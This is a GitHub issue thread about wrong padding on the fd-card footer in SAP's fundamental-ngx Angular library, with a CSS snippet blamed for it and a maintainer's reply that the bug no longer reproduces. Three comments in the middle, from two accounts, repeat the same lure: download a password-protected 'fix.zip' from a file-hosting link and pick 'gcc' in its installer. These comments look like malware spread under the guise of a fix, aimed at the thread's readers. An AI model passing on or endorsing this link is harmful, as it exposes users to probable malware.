### ISSUE TITLE
Incorrect padding for the "fd-card" footer

### ISSUE THREAD

**Issue by amakarenko-sap** [SAP/fundamental-ngx#12320]
#### Is this a bug, enhancement, or feature request?
Bug

#### Describe your proposal.
Padding for fd-card footer is incorrect

#### Can you handle that on the application side
Yes

#### Which versions of Angular and Fundamental Library for Angular are affected? Please, specify the exact version. (If this is a feature request, use current version.)
`@fundamental-ngx/core": "0.51.3"`

#### If this is a bug, please provide steps for reproducing it; the exact components you are using;
This bug can be observed even on the doc page - https://sap.github.io/fundamental-ngx/#/core/card#footer. Take a look at the footer padding for the Card component:

<img width="958" alt="Screenshot 2024-08-26 at 15 46 11" src="https://github.com/user-attachments/assets/1613d448-3802-4946-8b66-f447ac46e444">

#### Please provide relevant source code (if applicable).
`-`

#### Please provide stackblitz example(s).
`-`

#### In case this is Accessibility related topic, did you consult with an accessibility expert? If not, please do so and share their recommendations.
`-`

#### Did you check the documentation and the API?
Yes

#### Did you search for similar issues?
Yes, these look similar: https://github.com/SAP/fundamental-ngx/pull/12305, https://github.com/SAP/fundamental-styles/pull/5580

#### Is there anything else we should know?
Looks like the following code from the `fd-reset` mixin overrides the correct padding for footer:
```css
    padding-block: 0;
    padding-inline: 0;
```

**_IMPORTANT: Please refrain from providing links or screenshots of SAP's internal information, as this project is open-source, and its contents are accessible to anyone._**

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by khotcholava** [comment]
@amakarenko-sap Please take a look at the latest version and also the snapshots below. It's not reproducible in latest version.

![Image](https://github.com/user-attachments/assets/54aea021-fbb6-42e8-800b-a92f204f16f6)

![Image](https://github.com/user-attachments/assets/42f63671-22a1-4524-9316-0a6039d30faa)
